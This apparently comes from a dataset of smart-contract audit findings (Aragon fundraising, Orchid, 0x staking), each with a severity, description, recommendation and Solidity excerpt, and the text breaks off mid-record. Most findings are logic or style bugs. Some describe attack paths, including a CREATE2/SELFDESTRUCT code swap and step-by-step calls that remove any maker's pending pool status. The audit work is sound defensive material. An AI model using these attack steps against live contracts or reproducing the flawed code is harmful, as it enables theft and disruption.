fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\nчThe functions are only called once throughout the deployment process. The structs can therefore be created directly in the main method. Otherwise rename the functions to properly reflect their purpose.чч```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\n -EOPBCTemplate - inconsistent storage location declarationчlowч`_cacheFundraisingParams()` does not explicitly declare the return value memory location.\\n```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n\\n`_cacheFundraisingApps()` explicitly declares to return a copy of the storage struct.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n```\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by adding the missing storage location declaration.\\nStorage declarations should be consistent.чч```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n -EOPBCTemplate - EtherTokenConstant is never usedчlowчThe constant value `EtherTokenConstant.ETH` is never used.\\n```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by removing the `EtherTokenConstant` dependency.\\nRemove all references to `EtherTokenConstant`.чч```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\n -Staking node can be inappropriately removed from the treeчhighчThe following code in `OrchidDirectory.pull()` is responsible for reattaching a child from a removed tree node:\\n```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n\\nThe condition name(stake.left_) == `key` can never hold because `key` is the `key` for `stake` itself.\\nThe result of this bug is somewhat catastrophic. The child is not reattached, but it still has a link to the rest of the tree via its ‘parent_' pointer. This means reducing the stake of that node can underflow the ancestors' before/after amounts, leading to improper random selection or failing altogether.\\nThe node replacing the removed node also ends up with itself as a child, which violates the basic tree structure and is again likely to produce integer underflows and other failures.чAs a simple fix, use `if(name(stake.left_) == name(last))` as already suggested by the development team when this bug was first shared.\\nTwo suggestions for better long-term fixes:\\nUse a strict interface for tree operations. It should be impossible to update a node's parent without simultaneously updating that parent's child pointer.\\nAs suggested in (https://github.com/ConsenSys/orchid-audit-2019-10/issues/7), simplify the logic in `pull()` to avoid this logic altogether.чч```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n -Verifiers need to be pure, but it's very difficult to validate purenessчmediumчAfter the initial audit, a “verifier” was introduced to the `OrchidLottery` code. Each `Pot` can have an associated `OrchidVerifier`. This is a contract with a `good()` function that accepts three parameters:\\n```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n\\nThe verifier returns a boolean indicating whether a given micropayment should be allowed or not. An example use case is a verifier that only allows certain `target` addresses to be paid. In this case, `shared` (a single value for a given Pot) is a merkle root, `target` is (as always) the address being paid, and `receipt` (specified by the payment recipient) is a merkle proof that the `target` address is within the merkle tree with the given root.\\nA server providing bandwidth needs to know whether to accept a certain receipt. To do that, it needs to know that at some time in the future, a call to the verifier's `good()` function with a particular set of parameters will return `true`. The proposed scheme for determining that is for the server to run the contract's code locally and ensure that it returns `true` and that it doesn't execute any EVM opcodes that would read state. This prevents, for example, a contract from returning `true` until a certain timestamp and then start returning `false`. If a contract could do that, the server would be tricked into providing bandwidth without then receiving payment.\\nUnfortunately, this simple scheme is insufficient. As a simple example, a verifier contract could be created with the `CREATE2` opcode. It could be demonstrated that it reads no state when `good()` is called. Then the contract could be destroyed by calling a function that performs a `SELFDESTRUCT`, and it could be replaced via another `CREATE2` call with different code.\\nThis could be mitigated by rejecting any verifier contract that contains the `SELFDESTRUCT` opcode, but this would also catch harmless occurrences of that particular byte. https://gist.github.com/Arachnid/e8f0638dc9f5687ff8170a95c47eac1e attempts to find `SELFDESTRUCT` opcodes but fails to account for tricks where the `SELFDESTRUCT` appears to be data but can actually be executed. (See Recmo's comment.) In general, this approach is difficult to get right and probably requires full data flow analysis to be correct.\\nAnother possible mitigation is to use a factory contract to deploy the verifiers, guaranteeing that they're not created with `CREATE2`. This should render `SELFDESTRUCT` harmless, but there's no guarantee that future forks won't introduce new vectors here.\\nFinally, requiring servers to implement potentially complex contract validation opens up potential for denial-of-service attacks. A server will have to implement mitigations to prevent repeatedly checking the same verifier or spending inordinate resources checking a maliciously crafted contract (e.g. one with high branching factors).чThe verifiers add quite a bit of complexity and risk. We recommend looking for an alternative approach, such as including a small number of vetted verifiers (e.g. a merkle proof verifier) or having servers use their own “allow list” for verifiers that they trust.чч```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n -Use consistent staker, stakee ordering in OrchidDirectoryчlowч```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n\\n`OrchidDirectory.lift()` has a parameter `stakee` that precedes `staker`, while the rest of the code always places `staker` first. Because Solidity doesn't have named parameters, it's a good idea to use a consistent ordering to avoid mistakes.чResolution\\nThis is fixed in OrchidProtocol/[email protected]1cfef88.\\nSwitch `lift()` to follow the “staker then stakee” ordering convention of the rest of the contract.чч```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n -In OrchidDirectory.step() and OrchidDirectory.lift(), use a signed amount Won't Fixчlowч`step()` and `lift()` both accept a `uint128` parameter called `amount`. This `amount` is added to various struct fields, which are also of type `uint128`.\\nThe contract intentionally underflows this `amount` to represent negative numbers. This is roughly equivalent to using a signed integer, except that:\\nUnsigned integers aren't sign extended when they're cast to a larger integer type, so care must be taken to avoid this.\\nTools that look for integer overflow/underflow will detect this possibility as a bug. It's then hard to determine which overflows are intentional and which are not.\\n```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n\\n```\\nstep(key, stake, -current.amount\\_, current.parent\\_);\\n```\\nчResolution\\nThe variables in question are now uint256s. The amount of type casts that would be needed in case the recommended change was implemented would defeat the purpose of simplification.\\nUse `int128` instead, and ensure that amounts can never exceed the maximum `int128` value. (This is trivially achieved by limiting the total number of tokens that can exist.)чч```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n -Document that math in OrchidDirectory assumes a maximum number of tokensчlowч`OrchidDirectory` relies on mathematical operations being unable to overflow due to the particular ERC20 token being used being capped at less than `2**128`.\\nThe following code in `step()` assumes that no before/after amount can reach 2**128:\\n```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n\\nThe following code in `lift()` assumes that no staked amount (or total amount for a given stakee) can reach 2**128:\\n```\\nuint128 local = stake.amount\\_;\\nlocal += amount;\\nstake.amount\\_ = local;\\nemit Update(staker, stakee, local);\\n\\nuint128 global = stakees\\_[stakee].amount\\_;\\nglobal += amount;\\nstakees\\_[stakee].amount\\_ = global;\\n```\\n\\nThe following code in `have()` assumes that the total amount staked cannot reach 2**128:\\n```\\nreturn stake.before\\_ + stake.after\\_ + stake.amount\\_;\\n```\\nчDocument this assumption in the form of code comments where potential overflows exist.\\nConsider also asserting the ERC20 token's total supply in the constructor to attempt to block using a token that violates this constraint and/or checking in `push()` that the total amount staked will remain less than `2**128`. This recommendation is in line with the mitigation proposed for issue 6.7.чч```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n -Fees can be changed during the batchчhighчShareholders can vote to change the fees. For buy orders, fees are withdrawn immediately when order is submitted and the only risk is frontrunning by the shareholder's voting contract.\\nFor sell orders, fees are withdrawn when a trader claims an order and withdraws funds in `_claimSellOrder` function:\\n```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n\\nFees can be changed between opening order and claiming this order which makes the fees unpredictable.чResolution\\nFixed with AragonBlack/[email protected]0941f53 by storing current fee in meta batch.\\nFees for an order should not be updated during its lifetime.чч```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n -Bancor formula should not be updated during the batchчhighчShareholders can vote to change the bancor formula contract. That can make a price in the current batch unpredictable.\\n```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\nчBancor formula update should be executed in the next batch or with a timelock that is greater than batch duration.чч```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\n -Maximum slippage shouldn't be updated for the current batchчhighчWhen anyone submits a new order, the batch price is updated and it's checked whether the price slippage is acceptable. The problem is that the maximum slippage can be updated during the batch and traders cannot be sure that price is limited as they initially expected.\\n```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n\\nAdditionally, if a maximum slippage is updated to a lower value, some of the orders that should lower the current slippage will also revert.чSave a slippage value on batch initialization and use it during the current batch.чч```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n -AragonFundraisingController - an untapped address in toReset can block attempts of opening Trading after presaleчhighчAragonFundraisingController can be initialized with a list of token addresses `_toReset` that are to be reset when trading opens after the presale. These addresses are supposed to be addresses of tapped tokens. However, the list needs to be known when initializing the contract but the tapped tokens are added after initialization when calling `addCollateralToken` (and tapped with _rate>0). This can lead to an inconsistency that blocks `openTrading`.\\n```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n\\nIn case a token address makes it into the list of `toReset` tokens that is not tapped it will be impossible to `openTrading` as `tap.resetTappedToken(toReset[i]);` throws for untapped tokens. According to the permission setup in `FundraisingMultisigTemplate` only Controller can call `Marketmaker.open`\\n```\\nfunction openTrading() external auth(OPEN\\_TRADING\\_ROLE) {\\n for (uint256 i = 0; i < toReset.length; i++) {\\n tap.resetTappedToken(toReset[i]);\\n }\\n\\n marketMaker.open();\\n}\\n```\\nчInstead of initializing the Controller with a list of tapped tokens to be reset when trading opens, add a flag to `addCollateralToken` to indicate that the token should be reset when calling `openTrading`, making sure only tapped tokens are added to this list. This also allows adding tapped tokens that are to be reset at a later point in time.чч```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n -[New] Tapped collaterals can be bought by traders Won't FixчmediumчWhen a trader submits a sell order, `_openSellOrder()` function checks that there are enough tokens in `reserve` by calling `_poolBalanceIsSufficient` function\\n```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n\\nthe problem is that because `collateralsToBeClaimed[_collateral]` has increased, `controller.balanceOf(address(reserve), _collateral)` could also increase. It happens so because `controller.balanceOf()` function subtracts tapped amount from the reserve's balance.\\n```\\nfunction balanceOf(address \\_who, address \\_token) public view isInitialized returns (uint256) {\\n uint256 balance = \\_token == ETH ? \\_who.balance : ERC20(\\_token).staticBalanceOf(\\_who);\\n\\n if (\\_who == address(reserve)) {\\n return balance.sub(tap.getMaximumWithdrawal(\\_token));\\n } else {\\n return balance;\\n }\\n}\\n```\\n\\nAnd `tap.getMaximumWithdrawal(_token)` could decrease because it depends on `collateralsToBeClaimed[_collateral]`\\n```\\nfunction \\_tappedAmount(address \\_token) internal view returns (uint256) {\\n uint256 toBeKept = controller.collateralsToBeClaimed(\\_token).add(floors[\\_token]);\\n uint256 balance = \\_token == ETH ? address(reserve).balance : ERC20(\\_token).staticBalanceOf(reserve);\\n uint256 flow = (\\_currentBatchId().sub(lastTappedAmountUpdates[\\_token])).mul(rates[\\_token]);\\n uint256 tappedAmount = tappedAmounts[\\_token].add(flow);\\n /\\*\\*\\n \\* whatever happens enough collateral should be\\n \\* kept in the reserve pool to guarantee that\\n \\* its balance is kept above the floor once\\n \\* all pending sell orders are claimed\\n \\*/\\n\\n /\\*\\*\\n \\* the reserve's balance is already below the balance to be kept\\n \\* the tapped amount should be reset to zero\\n \\*/\\n if (balance <= toBeKept) {\\n return 0;\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming tap flow would be below the balance to be kept\\n \\* the flow should be reduced to balance - toBeKept\\n \\*/\\n if (balance <= toBeKept.add(tappedAmount)) {\\n return balance.sub(toBeKept);\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming flow is above the balance to be kept\\n \\* the flow can be added to the tapped amount\\n \\*/\\n return tappedAmount;\\n}\\n```\\n\\nThat means that the amount that beneficiary can withdraw has just decreased, which should not be possible.чEnsure that `tappedAmount` cannot be decreased once updated.чч```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n -Presale - contributionToken double cast and invalid comparisonчmediumчThe Presale can be configured to accept `ETH` or a valid `ERC20` `token`. This `token` is stored as an `ERC20` contract type in the state variable `contributionToken`. It is then directly compared to constant `ETH` which is `address(0x0)` in various locations. Additionally, the `_transfer` function double casts the `token` to `ERC20` if the `contributionToken` is passed as an argument.\\n`contribute` - invalid comparison of contract type against `address(0x00)`. Even though this is accepted in solidity `<0.5.0` it is going to raise a compiler error with newer versions (>=0.5.0).\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n\\n`_transfer` - double cast `token` to `ERC20` if it is the contribution `token`.\\n```\\nrequire(ERC20(\\_token).safeTransfer(\\_to, \\_amount), ERROR\\_TOKEN\\_TRANSFER\\_REVERTED);\\n```\\nч`contributionToken` can either be `ETH` or a valid `ERC20` contract address. It is therefore recommended to store the token as an address type instead of the more precise contract type to resolve the double cast and the invalid contract type to address comparison or cast the `ERC20` type to `address()` before comparison.чч```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n -Fees are not returned for buy orders if a batch is canceled Won't FixчmediumчEvery trader pays fees on each buy order and transfers it directly to the `beneficiary`.\\n```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n\\nIf the batch is canceled, fees are not returned to the traders because there is no access to the beneficiary account.\\nAdditionally, fees are returned to traders for all the sell orders if the batch is canceled.чConsider transferring fees to a beneficiary only after the batch is over.чч```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n -Tap - Controller should not be updateableчmediumчSimilar to the issue 6.11, `Tap` allows updating the `Controller` contract it is using. The permission is currently not assigned in the `FundraisingMultisigTemplate` but might be used in custom deployments.\\n```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\nчTo avoid inconsistencies, we suggest to remove this functionality and provide a guideline on how to safely upgrade components of the system.чч```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\n -Tap - reserve can be updated in Tap but not in MarketMaker or ControllerчmediumчThe address of the pool/reserve contract can be updated in `Tap` if someone owns the `UPDATE_RESERVE_ROLE` permission. The permission is currently not assigned in the template.\\nThe reserve is being referenced by multiple Contracts. `Tap` interacts with it to transfer funds to the beneficiary, `Controller` adds new protected tokens, and `MarketMaker` transfers funds when someone sells their Shareholder token.\\nUpdating reserve only in `Tap` is inconsistent with the system as the other contracts are still referencing the old reserve unless they are updated via the Aragon Application update mechanisms.\\n```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\nчRemove the possibility to update reserve in `Tap` to keep the system consistent. Provide information about update mechanisms in case the reserve needs to be updated for all components.чч```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\n -Presale can be opened earlier than initially assigned dateчmediumчThere are 2 ways how presale opening date can be assigned. Either it's defined on initialization or the presale will start when `open()` function is executed.\\n```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n\\nThe problem is that even if `openDate` is assigned to some non-zero date, it can still be opened earlier by calling `open()` function.\\n```\\nfunction open() external auth(OPEN\\_ROLE) {\\n require(state() == State.Pending, ERROR\\_INVALID\\_STATE);\\n\\n \\_open();\\n}\\n```\\nчRequire that `openDate` is not set (0) when someone manually calls the `open()` function.чч```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n -Presale - should not allow zero value contributionsчlowчThe Presale accepts zero value contributions emitting a contribution event if none of the Aragon components (TokenManager, MinimeToken) raises an exception.\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\nчReject zero value `ETH` or `ERC20` contributions.чч```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\n -FundraisingMultisigTemplate - should use BaseTemplate._createPermissionForTemplate() to assign permissions to itselfчlowчThe template temporarily assigns permissions to itself to be able to configure parts of the system. This can either be done by calling `acl.createPermission(address(this), app, role, manager)` or by using a distinct method provided with the DAO-Templates BaseTemplate `_createPermissionForTemplate`.\\nWe suggest that in order to make it clear that permissions are assigned to the template and make it easier to audit that permissions are either revoked or transferred before the DAO is transferred to the new user, the method provided and used with the default Aragon DAO-Templates should be used.\\nuse `createPermission` if permissions are assigned to an entity other than the template contract.\\nuse `_createPermissionForTemplate` when creating permissions for the template contract.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n\\nSidenote: pass `address(this)` instead of the contract instance to `createPermission`.чResolution\\nFixed with AragonBlack/[email protected]dd153e0.\\nUse `BaseTemplate._createPermissionForTemplate` to assign permissions to the template.чч```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n -FundraisingMultisigTemplate - misleading commentsчlowчThe comment mentionsADD_PROTECTED_TOKEN_ROLE but permissions for `ADD_COLLATERAL_TOKEN_ROLE` are created.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n\\n```\\n// transfer ADD\\_PROTECTED\\_TOKEN\\_ROLE\\n\\_transferPermissionFromTemplate(acl, controller, shareVoting, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), shareVoting);\\n```\\nч`ADD_PROTECTED_TOKEN_ROLE` in the comment should be `ADD_COLLATERAL_TOKEN_ROLE`.чч```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n -FundraisingMultisigTemplate - unnecessary cast to addressчlowчThe addresses of DAI (argument `address` _dai) and AND (argument `address` _ant) are unnecessarily cast to `address`.\\n```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\nчBoth arguments are already of type `address`, therefore remove the explicit cast to `address()` when pushing to the `collaterals` array.чч```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\n -FundraisingMultisigTemplate - DAI/ANT token address cannot be zeroчlowчThe fundraising template is configured with the `DAI` and `ANT` token address upon deployment and checks if the provided addresses are valid. The check performed is `_ensureTokenIsContractOrETH()` which allows the `address(0)` (constant for ETH) for the token contracts. However, `address(0)` is not a valid option for either `DAI` or `ANT` and the contract expects a valid token address to be provided as the deployment of a new DAO will have unexpected results (collateral `ETH` is added instead of an ERC20 token) or fail (DAI == `ANT` == 0x0).\\n```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n\\n```\\n function \\_ensureTokenIsContractOrETH(address \\_token) internal view returns (bool) {\\n require(isContract(\\_token) || \\_token == ETH, ERROR\\_BAD\\_SETTINGS);\\n}\\n```\\nчResolution\\nFixed with AragonBlack/[email protected]da561ce.\\nUse `isContract()` instead of `_ensureTokenIsContractOrETH()` and optionally require that `collateral[0] != collateral[1]` as an additional check to prevent that the fundraising template is being deployed with an invalid configuration.чч```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n -Anyone can remove a maker's pending pool join statusчhighчUsing behavior described in https://github.com/ConsenSys/0x-v3-staking-audit-2019-10/issues/11, it is possible to delete the pending join status of any maker in any pool by passing in `NIL_POOL_ID` to `removeMakerFromStakingPool`. Note that the attacker in the following example must not be a confirmed member of any pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, makerAddress)`. In this case, `makerAddress` can be almost any address, as long as it has not called `joinStakingPoolAsMaker` (an easy example is address(0)). The key goal of this call is to increment the number of makers in pool 0:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, targetAddress)`. This function queries `getStakingPoolIdOfMaker(targetAddress)` and compares it to the passed-in pool id. Because the target is an unconfirmed maker, their staking pool id is NIL_POOL_ID:\\n```\\nbytes32 makerPoolId = getStakingPoolIdOfMaker(makerAddress);\\nif (makerPoolId != poolId) {\\n LibRichErrors.rrevert(LibStakingRichErrors.MakerPoolAssignmentError(\\n LibStakingRichErrors.MakerPoolAssignmentErrorCodes.MakerAddressNotRegistered,\\n makerAddress,\\n makerPoolId\\n 